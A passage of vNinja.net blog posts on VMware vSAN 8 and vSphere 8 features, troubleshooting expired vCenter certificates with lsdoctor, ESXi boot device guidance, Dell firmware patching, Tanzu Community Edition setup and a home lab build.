enabled hosts can consume and share within a cluster. Available as both a hybrid (Flash+HDD), and as an all-flash solution. While the new vSAN Express Storage Architecture (ESA) is the flagship news in vSAN 8, there are also a few welcome improvements for vSAN Original Storage Architecture (OSA) in vSAN 8. Increased maximum capacity on devices in cache/buffer tier for OSA Cache/buffer tier maximum increased from 600GB to 1.6TB per disk group (All-flash) Health Monitoring for Limited Connectivity Environments Proactive notifications for environments not enrolled in Customer Experience Improvement Program (CEIP) Available in both vSAN OSA and ESA deployments A rather limited list of improvements for vSAN OSA in v8, but it was about time the cache device size was increased. vSAN Express Storage Architecture (ESA) # The new hotness, vSAN Express Storage Architecture (ESA), is a NVMe only option, which at launch requires a minimum of 4 NVMe devices per host. Gone are the concepts of cache devices and capacity devices, as well as the Disk Group concept. That’s right, no more vSAN Disk Groups in ESA, which helps lower the size of failure domains. Basically ESA is a single tier architecture, for all-NVMe based TLC storage devices. vSAN ESA will only be available on ESA approved vSAN Ready Nodes (and VxRail models, I presume). This means that there is a separate ESA HCL. It also requires vSAN Advanced, or Enterprise, licensing. At the time of announcement, there is no upgrade path from OSA to ESA, migration is done via vMotion/SvMotion to a new ESA cluster. The choice between OSA or ESA is done at time of deployment, and there is, at least not currently, no option to change a cluster from one architecture to the other. This new architecture is managed in the same way as OSA, through vCenter and the Distributed Object Manager. This new architecture enables quite an extensive list of new features and improvements: New Log-Structured File System Reduces I/O amplification Low overhead Allows for high performance snapshots New I/O engine for Modern Flash Devices New Log Structured Object Manager in vSAN ESA Highly parallell & efficient I/O engine that promised high bandwidth, low latencey, and consistent scaling. Express Storage Architecture (ESA) combines performance and capacity components into a single object, called legs Performance leg Ingests writes Prepares data for full stripe width Always RAID-1 mirror FTT of mirror equal to storage policy Lives on the same hosts as capacity leg components Capacity leg Combined data writtes as a full stripe write Adheres to storage policy (RAID-5, RAID-6, etc.) Optimized data handling Compression of data happes once, at ingest. This reduces the network traffic and CPU resources required. Encryption on data once, at ingest, which also reduces CPU requirements. Data checksums are calculated at ingest, and reuses already calculated CRCs. Asynchronous full stripe writes. These writes are fully parallel, and eliminates read-modify-write activities. New High Performance RAID-5/6 Erasure Coding Performance of RAID-5/6 will be equal to RAID-1 Adaptive RAID-5 improves space efficienty in smaller clusters. Automatic adjustmet of RAID-5 scheme, based on cluster size. 4+1 scheme used for 6 or more hosts, 2+1 scheme for 3-5 hosts. 4+1 scheme uses 1.25x capacity, 2+1 scheme uses 1.5x. Storage Policy-based Compression Capabilities Toggled by storage policy — enabled by default Minimal performance impact Finer granularity of compression rates, compared to vSAN OSA Improved efficiency with up to 8:1 compression ratios per 4KB data block Reduced Overhead Encryption occurs earlier on the write path, in order to minimize CPU resource usage and I/O amplification Eliminates decrypt/recrypt steps for reduced CPU consuption, and increased network efficiency Improved Point-in-Time native snapshots Vastly improved snapshot performance, with low stun times Highly scalable and efficient Seamless integration with vSphere & 3rd party VADP backup solutions Snapshots of objects in degraded status Check core.vmware.com/vsan for the most up to date documentation on vSAN 8 Closing Comments # It is obvious that going forward, the new vSAN Express Storage Architecture (ESA) should be the preferred choice for most deployments. The world has pretty much moved on from SSD’s to NVMe devices, and a new architecture model that makes better use of those devices is clarly a good idea. The improvements that ESA promises, both from a performance (CPU usage and I/O) perspective alone makes it very interesting. Getting rid of the management overhead, and failure-domain issues, that comes with the Disk Group (cache and capacity devices) construct in vSAN OSA is also a welcome change. Simplifying the design and implementation and at the same time improving performance sounds like a good deal to me. Given that vSAN 8 ESA delivers what it promises, this is a very welcome and big upgrade from the vSAN we already know. Resources # Last updated 01. september 2022 VMware: Dave Morera announces vSAN 8 (YouTube) VMware: Announcing vSAN 8 VMware: vSAN Express Storage Architecture (ESA) VMware: Virtually Speaking Podcast: Introducing vSAN 8 and the Express Storage Architecture StorageReview: VMware vSAN 8 Express Storage Architecture Announced --- # VMware vSphere 8 — The Enterprise Workload Platform Announced! URL: https://vNinja.net/2022/08/30/vmware-vsphere8-announced/ Date: 2022-08-30 Author: christian Tags: vSphere, vSAN, VMware, ESXi VMware announces vSphere 8 — The Enterprise Workload Platform at VMware Explore US. The new release comes with a number of new features and enhancements. At the time of writing, no set General Availability date has been published, but look for it being available some time this fall. Here’s a quick summary: vSphere Distributed Services Engine # Remember Project Monterey that was announced as a Tech Preview at VMworld 20201. Parts of that has now found its way into the core vSphere 8 offering. Called the vSphere Distributed Services Engine, this enables the offloading of network servies to Data Processing Units (DPU). This first version of enables offloading of NSX Services to a SmartNIC (DPU) using a new vSphere Distributed Switch version 8.0: By offloading the processing of network traffic to a DPU instead of using the CPU, frees up resources that hosts and VMs can take advantage of, as well as help increase network performance. It will also enhance visibility and observability of the network traffic and provide better encryption, isolation and protection. See DPU-based Acceleration for NSX: Deep Dive (Youtube) for more details. VMware vSphere with Tanzu # vSphere now runs Tanzu Kubernetes Grid (TKG) 2.0, with the following enhancements: Unified Tanzu Kubernetes Grid Increased availability with Workload Availability Zones Declarative cluster lifecycle with ClusterClass Define It Once, Use It Many Times — This is an Upstream Kubernetes conformant ClusterAPI. Defines configuration and default installed packages for Tanzu Kubernetes clusters. ClusterClass is defined in the cluster deployment specification. Customize PhotonOS or Ubuntu images Pinniped Integration Bring Your Own Identity Provider, you can now decouple Kubernetes identities from the vCenter Single Sign-on Domain. Pinniped Federates identity from many identity providers (IDPs) OIDC and LDAP support Supervisor and TKG Clusters support Pinniped based authentication Login Integration through Tanzu CLI Lifecycle Management # Lifecycle Manager Images is the default option going forward.2 vSphere 8 is the last release where Lifeycle Manager baselines (vSphere Update Manager) is supported, only vSphere Lifecycle Manager (vLCM) images will be supported going forward. Enhanced Recovery of vCenter Recover vCenter without data loss. Cluster state persists in ESXi hosts as a Distributed Key-Value Store (DKVS) Distributed key-value store becomes the cluster source-of-truth vCenter cluster state reconciles with the vSphere cluster during backup recovery In short, this means that in a scenario where a host was added to a cluster after a vCenter backup was taken, and the vCenter is restored to that earlier backup the vCenter reconciles the cluster state with the state from the Distributed Key-Value Store (DKVS). Other enhancements and news: Staging Support Stage update payloads in advance of remediation, without the need for maintenance mode Reduces overall remediation time and time spent in maintenance mode per host Less risk of remediation failure from live image transfer Firmware payloads staged with Hardware Support Manager integration Parallel Remediation Remediate multiple hosts in parallel Reduce the lifecycle operation time of a cluster vSphere Administrator decides how many hosts will be remediated in parallel by placing the desired hosts into maintenance mode It is my understanding that in vSAN enabled clusters, only one host will be allowed to remediate at a time to ensure that all data in a cluster remains available at all times. vSphere Configuration Profiles Configuration Management at scale — Future replacement for Host Profiles available as a Tech Preview in vSphere 8 A new desired-state model for all configuration options, with compliance drift monitoring. Remediates hosts back to desired state. Standalone Host Support (API only) VCG Listings for Hardware Security Modules feature support DPU Support Unified Management for AI/ML Hardware Accelerators # Combine NIC and GPU devices Share a common PCIe switch or a direct interconnect Discovered at the hardware layer and presented to vSphere Added to a virtual machine as a single unit NVIDIA® support launching shortly after vSphere 8 GA Next-Generation of Virtual Hardware Devices — Device Virtualization Extensions (DVX) # New API for vendors to create hardware-backed virtual devices Supports vSphere DRS and vSphere HA Can support live migration using vSphere vMotion Can support VM suspend and resume Can support disk and memory snapshots Guest OS & Workloads # Virtual Hardware version 20 Latest Intel and AMD CPU support Device Virtualization Extensions Up to 32 DirectPath I/O devices Guest Services for Application vSphere Datasets Application aware migrations Latest guest operating system support Performance and Scale Up to 8 vGPU devices Device Groups High Latency Sensitivity with Hyperthreading Virtual TPM Provisioning Policy Choose between Copy or Replace when deploying VMs configured with vTPM devices Copy will clone TPM secrets Replace will reset the vTPM device as new ovftool support for vTPM device placeholder Migration aware applications Notify supported applications about migration taks, and let the application ackownledge that the migration can proceed Use-cases Time-sensitive applications VoIP applications Clustered applications High latency sensitivity with hyper-threading Virtual Machine vCPUs are scheduled on the same hyperthreaded physical CPU core Simplified vNUMA configuration Virtual NUMA topology and configuration is exposed to the vSphere Client Configure virtual NUMA configuration during new VM creation Edit CPU Topology settings of existing VM vSphere DataSets Share data between vSphere and a Guest OS Data is stored and moves with the VM Use-cases Guest deployment status Guest agent configuration Perfect for things like SaltStack or similar. Guest inventory management vSphere Scalability # Not much has changed as far as maximum configurations go, check the table below for details. Always check configmax.vmware.com for updated information. Compute Resource vSphere 7 U3 vSphere 8 vCPU per VM 768 768 Memory per VM 24 TB 24TB vGPU per VM 4 8 CPU per host 896 896 Memory per host 24 TB 24TB Hosts managed by vLCM 400 1000 Hosts per cluster 96 96 VMs per cluster 8000 10000 VMDirectPath I/O devices per host 8 32 Enhanced DRS Performance # Some updates has been done to the to Dynamic Resource Scheduling (DRS) vSphere Memory Monitoring and Remediation v2 (vMMR2) Supports Intel® Optane PMem Better distribution of L3 cache prefetch data on DRAM and Pmem Uses Memory Stats for better VM placement Security # There has also been some improvements when it comes to security in vSphere 8. Improvements to Intel® Software Guard Extensions (SGX) 3 TLS 1.2 & Better Cipher suites are now default Prevent Untrusted Binaries Basically VMkernel.Boot.execInstalledOnly is now default, preventing untrusted binaries from running on an ESXi host without this setting being explicitly changed. As this is one of the most common ransomware attack vectors, this is a welcome change to the deaults. Always check VMware vSphere 8 Security Configuration Guide for updated security information. Closing Comments # All in all vSphere 8 looks like a good incremental release, with a bunch of useful enhancements and new features. There are no really huge game-changing features in the release, perhaps with the exception of the vSphere Distributed Services Engine. It is clear that we are moving more and more towards specialized silicon for specific tasks. GPU’s and DPU’s are gaining momentum! Truthfully we have had things like iSCSI and TCP Offloading (TOE) for a long time, but this goes beyond that. DSE enables software on the host to actively use the processing power of a DPU, much like what is done wth GPUs. Going forward I expect seeing more services move over to such a model, perhaps things like vSAN can use this technology as well, For now DSE does not support VMkernel ports, so at the time of writing this is not possible, but I’m sure that is something that is being actively worked on. Once we have VMkernel support on DPU’s, we might also see vCenter Management of non-ESXi hosts as well, for bare-metal (sic) workloads. Specialized silicon for specialized workloads really makes sense to me, not everything needs to be x86 after all. Other than that, this release feels like an evolutionary release — which makes a lot of sense. vSphere is still the defacto on-premises datacenter standard, and this continues to build on that. In my opinion the real news in vSphere 8 is really vSAN 8 and it’s new architecture model!. Check core.vmware.com/vsphere for all the details, there should be info about vSphere 8 there already — if not, it’s right around the corner. Resources # Last updated 01. september 2022. VMware: vSphere 8 Sneak Peak with Raghu Raghuram (YouTube) VMware: Introducing vSphere 8: The Enterprise Workload Platform VMware: What’s New with vSphere 8 Core Storage VMware: What’s New in vSphere 8? VMware: DPU-based Acceleration for NSX: Deep Dive Duncan Epping: Introducing vSphere 8! Frank Denneman: New vSphere 8 Features for Consistent ML Workload Performance The Register: VMware reckons 20% of server cores can come back to work thanks to vSphere 8 and SmartNICs Footnotes # The rise of DPUs in the Infrastructure ↩︎ vSphere Lifecycle Manager Baselines and Images ↩︎ Intel® Software Guard Extensions ↩︎ --- # Expired VMware vCenter certificates URL: https://vNinja.net/2022/08/08/expired-vmware-vcenter-7-certificates/ Date: 2022-08-08 Author: stine Tags: ESXi, VMware, vSphere, vCenter, PKI, TLS, Certificate AKA Something fishy in a sea of red herrings # Last week, I worked with a customer on what was seemingly a straightforward VMware vCenter 7 certificate replacement job but encountered several red herrings that also turned out to be issues that needed solving. I thought I’d share these in this post, in the hope that they can help others in future. The initial issue was that during the summer holidays, the customer’s certificates had expired, and they were presented with “Error 503, service unavailable” messages when trying to log into vSphere Client. While renewing certificates with certificate-manager in vCenter BASH Shell via SSH the services got stuck at 85%, and then failed to start after several minutes. The first thing I checked was that the time was set correctly. If the time is incorrect, it can cause several issues. Since we were able to log into vCenter Server Appliance Management Interface (VAMI), I was able to check that the NTP source was set up and that there were no issues. This can also be done in vCenter BASH Shell via SSH by using the commands ntp.get to check the configured NTP, and the command date. I also checked if the STS certificate had expired I then checked if there was enough disk space with df -h. After confirming that the services were still getting stuck on 85% after a reboot of the vCenter, I checked the certificate manager log, which you can find here: /var/log/vmware/vmcad/certificate-manager.log. In the log, I could see that there were inconsistencies in how the Fully Qualified Domain Name (FQDN) of the vCenter was written, and there were errors pointing to problems with the Subject Alternate Name (SAN). Since I was unsure what was written in the old certificate, I had a look in the BACKUP_STORE using /usr/lib/vmware-vmafd/bin/vecs-cli entry list –store BACKUP_STORE –text | less, and compared it to the input that was used when renewing the certificate. However, after correcting the new certificate, we were still stuck on 85%. A colleague of mine had experienced a similar issue in his home lab and shared his notes with me, which pointed to the Primary Network Identifier (PNID) not being present in the certificate. I checked this by comparing /usr/lib/vmware-vmafd/bin/vmafd-cli get-pnid –server-name localhost with the certificate and the local hostname of the vCenter. None of these were written in the same case (some being lowercase and others in caps). I also used the vSphere Diagnostics Fling to make sure. I then used the PNID as the master and changed the hostname with this VAMI network configuration tool. After all of this, I was confident that I had found the error, but it was still stuck on 85% after resetting the certificates. I then tried resetting the Security Token Service (STS) certificate and replacing all the certificates through certificate-manager, but no luck. After a dive through all the logs imaginable, and man does vCenter have a lot of log files, I found an error in the vpxd.log which said, “Unable to get certificates from the store APPLMGMT_PASSWORD” alongside “Failed to read X509 cert; err: 151441516”. My colleague had also experienced this before and suggested that I run the following commands: grep -Hinr "password error" /var/log/vmware/vmdird/*.log and grep -Hinr "Bind Request" /var/log/vmware/vmdird/*.log. As he expected, there were several “Bind request failed” errors and authentication errors pointing to password errors. These pointed to the Administrator user first, so I changed the password using the vdcadmintool, and tried restarting the services with no success. I then tried changing the STS certificate again and a new error appeared, which said: “Error 9234: Authentication to VMware Directory service failed”. Now, the grep commands were showing the password error for the machine account, so I changed that as well. Unfortunately, changing the certificates yet again failed when restarting the services. Following that, we also tried changing the certificates from self-signed to custom, but the services still wouldn’t start. At this point, we contacted VMware support. The advisor from VMware support could tell by the order the services were trying to start up that something was wrong with the certificates, and it pointed to an SSL trust mismatch. This was finally fixed with the lsdoctor tool, and applying the –trustfix parameter to correct the SSL trust values and then restarting the services: Running lsdoctor -l to identify issues # root@vc01 [ /tmp/lsdoctor-master ]# python lsdoctor.py -l ATTENTION: You are running a reporting function. This doesn't make any changes to your environment. You can find the report and logs here: /var/log/vmware/lsdoctor 2022-08-03T12:04:11 INFO main: You are reporting on problems found across the SSO domain in the lookup service. This doesn't make changes. 2022-08-03T12:04:11 INFO live_checkCerts: Checking services for trust mismatches... 2022-08-03T12:04:11 INFO generateReport: Listing lookup service problems found in SSO domain 2022-08-03T12:04:11 ERROR generateReport: default-site\vc01.local (VC 7.0 or CGW) found SSL Trust Mismatch: Please run python ls_doctor.py --trustfix option on this node. 2022-08-03T12:04:11 INFO generateReport: Report generated: /var/log/vmware/lsdoctor/vc01.local-2022-08-03-120411.json root@NO0137VMVC [ /tmp/lsdoctor-master ]# Running lsdoctor -t or –trustfix to fix the trust issues # root@vc01 [ /tmp/lsdoctor-master ]# python lsdoctor.py -t WARNING: This script makes permanent changes. Before running, please take *OFFLINE* snapshots of all VC's and PSC's at the SAME TIME. Failure to do so can result in PSC or VC inconsistencies. Logs can be found here: /var/log/vmware/lsdoctor 2022-08-03T12:04:54 INFO main: You are checking for and fixing SSL trust mismatches in the local SSO site. NOTE: Please run this script one PSC or VC per SSO site. Have you taken offline (PSCs and VCs powered down at the same time) snapshots of all nodes in the SSO domain or supported backups?[y/n]y Provide password for administrator@vm-oss.local: 2022-08-03T12:05:15 INFO __init__: Retrieved services from SSO site: default-site 2022-08-03T12:05:15 INFO findAndFix: Checking services for trust mismatches... 2022-08-03T12:05:15 INFO findAndFix: Attempting to reregister 4de1c858-08a7-43ec-903b-ca8198b08cb4_kv for vc01.local 2022-08-03T12:05:15 INFO findAndFix: Attempting to reregister 0352ce58-1812-47fa-ab3c-db913e8ad484 for vc01.local 2022-08-03T12:05:16 INFO findAndFix: Attempting to reregister f2314a00-e755-46d0-a689-4b7f389aedce for vc01.local 2022-08-03T12:05:16 INFO findAndFix: Attempting to reregister d935f890-87ae-459a-b3e7-3c2fb3ad1ceb for vc01.local 2022-08-03T12:05:16 INFO findAndFix: Attempting to reregister default-site:c8d08fa1-c4c0-4a45-bd70-c725d462ceb9 for vc01.local 2022-08-03T12:05:16 INFO findAndFix: Attempting to reregister 6fb48414-9db1-4c84-80d3-fadc5dbdd4aa for vc01.local 2022-08-03T12:05:16 INFO findAndFix: Attempting to reregister default-site:44b21511-a65b-4fbb-90ca-e01f3a35b16b for vc01.local 2022-08-03T12:05:17 INFO findAndFix: Attempting to reregister c59863c5-c736-4c77-b2da-523e0d3444df for vc01.local 2022-08-03T12:05:17 INFO findAndFix: Attempting to reregister 81f488c3-d975-417d-8341-012e135c1de8 for vc01.local 2022-08-03T12:05:17 INFO findAndFix: Attempting to reregister 71bccc22-085e-4bc9-92ce-c8dafa75d03f for vc01.local 2022-08-03T12:05:17 INFO findAndFix: Attempting to reregister aa296055-6610-4372-96af-b02e2034b320 for vc01.local 2022-08-03T12:05:17 INFO findAndFix: Attempting to reregister a0e44029-8f89-4ba2-aacd-81e690a218d0 for vc01.local 2022-08-03T12:05:18 INFO findAndFix: Attempting to reregister f4174796-4081-4d52-abc0-fc72384e3c08 for vc01.local 2022-08-03T12:05:18 INFO findAndFix: Attempting to reregister 12c24187-9d14-414d-bf73-e5b95e35ee80 for vc01.local 2022-08-03T12:05:18 INFO findAndFix: Attempting to reregister fa2bf3a9-efb7-41c2-88d2-5da0b8537e2e for vc01.local 2022-08-03T12:05:18 INFO findAndFix: Attempting to reregister 113e9a79-53a8-4bac-a098-00f86e6052cd for vc01.local 2022-08-03T12:05:18 INFO findAndFix: Attempting to reregister 1730d264-c24f-4a00-8954-cec9c622a126 for vc01.local 2022-08-03T12:05:19 INFO findAndFix: Attempting to reregister 68b48005-6902-406c-ab83-590aec3436d4 for vc01.local 2022-08-03T12:05:19 INFO findAndFix: Attempting to reregister 4de1c858-08a7-43ec-903b-ca8198b08cb4_authz for vc01.local 2022-08-03T12:05:19 INFO findAndFix: Attempting to reregister 74c3b715-23c4-4a84-bd7a-b4779b0947bc for vc01.local 2022-08-03T12:05:19 INFO findAndFix: Attempting to reregister 53bd1727-8664-4b06-bc5b-25cf77d37e59 for vc01.local 2022-08-03T12:05:20 INFO findAndFix: Attempting to reregister 06c4cd74-6aeb-4380-8c2f-04b8fba64eb2 for vc01.local 2022-08-03T12:05:20 INFO findAndFix: Attempting to reregister 1878c18b-fb06-4e43-b46e-9682c64b40ed for vc01.local 2022-08-03T12:05:20 INFO findAndFix: Attempting to reregister 605f8faa-f7c8-447a-b27b-b8f6e839e41e for vc01.local 2022-08-03T12:05:21 INFO findAndFix: Attempting to reregister 68a74ee0-2a99-43bb-b663-0e649325e8bb for vc01.local 2022-08-03T12:05:21 INFO findAndFix: Attempting to reregister 35d8d394-fc08-4acc-844f-392adbdb86bb for vc01.local 2022-08-03T12:05:21 INFO findAndFix: Attempting to reregister a73f8eba-a5a0-447a-8b81-c557692f7727 for vc01.local 2022-08-03T12:05:22 INFO findAndFix: Attempting to reregister db13ccae-b4fa-4ce1-a2ae-f68e081373ff for vc01.local 2022-08-03T12:05:22 INFO findAndFix: Attempting to reregister a096685e-ef11-4301-9d61-deeea4cced69 for vc01.local 2022-08-03T12:05:22 INFO findAndFix: Attempting to reregister b46c40af-33b8-4e8e-91a2-034b7286e679 for vc01.local 2022-08-03T12:05:22 INFO findAndFix: Attempting to reregister 2dd172a6-64e4-43db-9ee5-1aae64171d91 for vc01.local 2022-08-03T12:05:22 INFO findAndFix: Attempting to reregister 4de1c858-08a7-43ec-903b-ca8198b08cb4 for vc01.local 2022-08-03T12:05:23 INFO findAndFix: Attempting to reregister 77f9c3f9-582f-4570-96ff-6d2efd3f87e5 for vc01.local 2022-08-03T12:05:23 INFO findAndFix: Attempting to reregister a62ce6f2-733e-4ee4-8157-1340f9dec30f for vc01.local 2022-08-03T12:05:23 INFO findAndFix: Attempting to reregister 5d845f2e-8c91-48d4-b5d9-04eb81d3c569 for vc01.local 2022-08-03T12:05:24 INFO findAndFix: Attempting to reregister 739c41fd-f740-4742-8a27-aca98e744296 for vc01.local 2022-08-03T12:05:24 INFO findAndFix: Attempting to reregister default-site:a7622a00-b4a2-41b4-9242-35e58beb7bde for vc01.local 2022-08-03T12:05:24 INFO findAndFix: Attempting to reregister 0a8283c3-706c-4ac7-985d-6bf43dc8b8d7 for vc01.local 2022-08-03T12:05:24 INFO findAndFix: Attempting to reregister 6e77038c-c6f5-4a06-b6a4-e9685fab7ade for vc01.local 2022-08-03T12:05:24 INFO findAndFix: Attempting to reregister ec5e3e40-5226-44c0-bda6-b76a0eb272de for vc01.local 2022-08-03T12:05:25 INFO findAndFix: Attempting to reregister ab5fc7c7-407c-4134-8760-42124d7c3cb3 for vc01.local 2022-08-03T12:05:25 INFO findAndFix: Attempting to reregister 4f2e79de-9b47-4158-bd5e-a53bce45002c for vc01.local 2022-08-03T12:05:25 INFO findAndFix: Attempting to reregister c04bd00d-3a3f-45b3-a307-49e26c380ba0 for vc01.local 2022-08-03T12:05:25 INFO findAndFix: Attempting to reregister ec4c6fbf-bf3f-4594-9064-d9387ea803c3 for vc01.local 2022-08-03T12:05:25 INFO findAndFix: We found 44 mismatch(s) and fixed them :) 2022-08-03T12:05:25 INFO main: Please restart services on all PSC's and VC's when you're done. Once this was done the services started up again successfully and the vCenter was operational again. Checking service status # root@vc01 [ /tmp/lsdoctor-master ]# watch service-control --status --all Every 2.0s: service-control --status --all vc01.local: Wed Aug 3 12:16:19 2022 Running: applmgmt lookupsvc lwsmd observability observability-vapi pschealth vlcm vmafdd vmcad vmdird vmonapi vmware-analytics vmware-certificateauthority vmware-certificatemanagement vmware-cis-license vmware-c ontent-library vmware-eam vmware-envoy vmware-hvc vmware-infraprofile vmware-perfcharts vmware-pod vmware-postgres-archiver vmware-rhttpproxy vmware-sca vmware-sps vmware-statsmonitor vmware-stsd vmware- topologysvc vmware-trustmanagement vmware-updatemgr vmware-vapi-endpoint vmware-vdtc vmware-vmon vmware-vpostgres vmware-vpxd vmware-vpxd-svcs vmware-vsan-health vmware-vsm vsphere-ui vstats vtsdb wcp Stopped: vmcam vmware-imagebuilder vmware-netdumper vmware-rbd-watchdog vmware-vcha Conclusion # In conclusion, there was a lot to learn from this issue. Firstly, what might seem like red herrings, may very well be underlying problems that also needs to be solved. In the end, the final issue was fixed by VMware Support, but without all the troubleshooting steps performed before they were brought on board, the fix might not have been so straight forward. Secondly, certificate issues like this are notoriously hard to troubleshoot, especially given the interdependencies between them and the internal vCenter services. Thirdly, there is no shame in asking for help. As Nick Craver, Principal Software Engineer @ Microsoft put it: "Are certs evil?" "That depends" "On what?" "Is there a stronger word than evil?" — @Nick_Craver@infosec.exchange (@Nick_Craver) April 8, 2022 I would also like to highlight these tools if you have VMware vCenter certificate issues: vSphere Diagnostic Tool vCert Using the ’lsdoctor’ Tool (80469) --- # VMware issues Updated ESXi SD card USB Boot Device Guidance URL: https://vNinja.net/2022/04/27/updated-esxi-sdcard-usb-boot-device-guidance/ Date: 2022-04-27 Author: christian Tags: ESXi, VMware, vSphere VMware has released an updated version of KB85685 SD card/USB boot device revised guidance (85685). Previous versions of this KB stated that in the next major version of ESXi SD Card / USB boot would be deprecated and unsupported. This has now changed, as the updated version dated 27th of April 2022 states the following: VMware will continue supporting USB/SD card as a boot device through the 8.0 product release, including the update releases. Both installs and upgrades will be supported on USB/SD cards. The change from the previous guidance is that SD/USB as a standalone device will now be supported on previously certified server platforms. This is good news, even if the recommendation still is to move away from SD Card / USB boot for new hosts. We all know that especially SD Cards are troublesome, as well as USB pendrives, but still allowing USB boot in the next major version is great news for home lab users, who like me, often run ESXi from an external SSD drive, connected via USB. As a sidenote, it’s curious that VMware now explicitly mentions version 8.0 in a public KB, given that no information on the next major version has been made publicly available at this time. The KB also outlines how 8.0 will move the entire OSData partition to an available persistent device, and to RAMDisk should one not be available. --- # Patching Dell Optiplex 7090 UFF URL: https://vNinja.net/2022/03/29/patching-dell-optiplex-7090-uff/ Date: 2022-03-29 Author: christian Tags: vSphere, vSAN, VMware, ESXi, Home Lab, Dell, OptiPlex 7090 My new lab is based on Dell OptiPlex 7090 UFF hosts and after enabling vSAN on the four node cluster, the first two hosts I set up started having issues, especially with the cache devices. It seems that they just disappear from the host, especially when doing IO-intensive operations like changing the vSAN policy for a few VMs from RAID-1 to RAID-5. Once the host is rebooted, the device is back in place, seemingly without issues until the next time it disappears. Strangely this was not a problem before I configured vSAN, and only used the same devices as local datastores. The two other hosts in the cluster has not shown any of the same issues, so I suspected it might be a firmware or BIOS issue. The two first hosts were both running BIOS version 1.4.1 and the two other hosts were running 1.5.0. Since 1.8 is the latest version, available upgrading it was the natural thing to do. Thankfully the BIOS upgrade is fairly simple, just download the new version from dell.com and follow the instructions. Since I’m running ESXi on these hosts, I updated the BIOS through the BIOS itself, with the upgraded version on a USB stick. This worked just fine, but after getting the hosts updated and back online, I still had the same problem with the disappearing vSAN cache devices. After some further investigation, it turns out that there are a few firmware updates available for my NVMe devices as well. Naturally I did not need the Intel Rapid Storage Technology Driver and Application, but the others on that list looked interesting, and could have some bearing on the vSAN cache device issue I am experiencing. The problem with all of these, is that Dell has decided that the way to patch them is though Microsoft Windows. This poses a problem in my lab, since I don’t have any Windows instances that has direct access to the underlying hardware. In order to get the firmware patched, I needed to create a new USB boot device, and get Windows installed on that before placing my host in maintenance mode and rebooting it with Windows. Luckily I had an old USB HDD laying around that was fit for purpose. Armed with a Windows 10 ISO, I booted up a Windows VM in my vSphere environment, and installed WinToUSB inside the VM. I then connected the external USB HDD, via passthrough USB, to the VM and created a Windows installation on the bootable external USB drive. Once that process was done, I copied all my downloaded Dell firmware upgrades to the disk, and disconnected it from the VM. After placing the host in maintenance mode to evacuate it, I powered it off and disconnected my ESXi boot disk and replaced it with the new Windows to Go installation and booted the host with it. Then it was simply a matter of running the updates from the Windows instance, and reboot the hosts with the ESXi boot device again. Extract the updates from the Dell provided installer by running filename.exe /s /e=c:\mydir in an elevated Windows command prompt. This makes it much easier to run the updates if you don’t have a mouse installed. At this point I’m not sure if the firmware upgrades have actually alleviated the problem, or not but the first indications are that it might not have. If that’s the case, I will have to dig deeper to find out if there is anything I can do about it in this very much unsupported environment. --- # Installing Tanzu Community Edition on vSphere — Some Quick Notes URL: https://vNinja.net/2022/03/16/tanzu-community-edition-vsphere-notes/ Date: 2022-03-16 Author: christian Tags: TCE, Tanzu, K8s, Home Lab, vSphere Installing Tanzu Community Edition (TCE) on vSphere is well documented on the tanzucommunityedition.io site, but I ran into a couple of small quirks when installing it in my home lab. Bind the installer to the external IP of the bootstrap machine # The TCE installer offers a browser based installation wizard, but the default command binds the interface to the localhost interface, and opens port 8080 in a local browser. tanzu management-cluster create --ui Since I’m using a dedicated bootstrap VM here, over ssh, that doesn’t really work all the well. Thankfully it’s easy to change, just start the installer with this command instead, which also doesn’t try to pop a local browser. tanzu management-cluster create --ui --bind <VM IP>:8080 --browser none This binds the installer interface to port 8080 on the vNIC in the VM, and makes it available from a browser in the same network. Pick your distro carefully # I normally use Ubuntu for all my Linux needs, and decided to do so for the bootstrap machine required to install TCE. After spinning up a new VM from an Ubuntu 21.10 template I already had available, and installing all the Tanzu CLI requirements, it failed bringing bootstrapping the the management cluster in vSphere. This was due to Ubuntu 21.10 using cgroup2 by default, something that is currently unsupported in TCE v0.10.0. Note that TCE v0.11.0 version that is currently in RC1 fixes this, and it shouldn’t be a problem once that has been released. After messing about with trying to change Docker on Ubuntu 21.10 to use cgroup1 for a while, I decided it was just easier to deploy a new Ubuntu boostrap VM for this, based on Ubuntu 16.04 — which uses cgroup1 by default. Once I changed the Ubuntu version, and followed the installation guides I was able to get the TCE management cluster installed in my vSphere environment. Now I just need to figure out how to use it, and start moving some of the container based services I run in my local network over to it. Time to get to work in the new lab! --- # The Home Lab: 2022 Edition URL: https://vNinja.net/2022/03/07/the-home-lab-2022-edition/ Date: 2022-03-07 Author: christian Tags: vSphere, vSAN, VMware, ESXi, Home Lab Some History # For years now my so called home lab has been a single Dell Precision T7500 host, with a total of 24 GB RAM and a few TB of locally attached disks. Not much there in terms of redunancy! I also had a small Synology DS216play and a very old HP MicroServer N36L that I ran FreeNAS on. A few months back, the MicroServer decided to call it quits after many, many years of service (it was released in May 2010!). To replace it I got ordered a new Synology DS920+ with 4 x Seagate IronWolf 4TB 3.5" NAS HDD’s. In order to get my data rescued from my old MicroServer/FreeNAS setup, I had to gut the old Precison T7500 and move the disk controller over to it, and then install FreeNAS in order to import the ZFS pool. In fact, I kept the drives in the MicroServer chassis, and just moved the disk controller over to the T7500, and booted it up with FreeNAS. Thankfully I got all 3TB worth of data copied out of the ZFS Pool and onto the new Synology NAS. After that it was just a case of booting up ESXi again on the T7500 and I was back in action. This did however highlight that the home lab environment was in dire need of a complete overhaul. A single ESXi host, with obsolete CPU’s, 24 GB of ram and some local disks just wasn’t cutting it anymore. I couldn’t even run a VMware vCenter properly without saturating the entire host, and there was no room for playing around with anything new. And, let’s face it, a home lab that runs Home Assistant, Plex, Pi-Hole and various other services, is in reality a production environment! Thankfully my employer Proact has a proper local work lab, so most things I need for work I can test out and play with there, but I still have need to do some ad-hoc testing and nothing beats the possibility of spinning up new things quickly in a local environment. So, I started on a quest looking to revamp the home lab, exploring different hardware options and looking at availability of said components. New Hosts — A Surprising Form Factor # My new hosts are 4 x Dell OptiPlex 7090 UFF. Yes, the ones designed to mountable inside the monitor stand of some Dell monitors. They are small and quiet, which is kind of the holy grail when it comes home labs. Most home labs these days are based on Intel NUCs, but due to the current supply chain issues NUCs where close to impossible to get hold of when I needed new hosts. The OptiPlex 7090’s fit the bill, as they are capable of supporting 64 GB RAM, and can be equipped with i7-1185G7 (Tiger Lake) CPUs. This, combined with M.2 NVMe devices internally is definitively quite a few steps up from my old Precision T7500 with actual HDDs aka spinning rust. These hosts will be running VMware ESXi, naturally, and in order to get the internal Intel Corporation Ethernet Connection (13) I219-LM NIC working, I needed the Community Networking 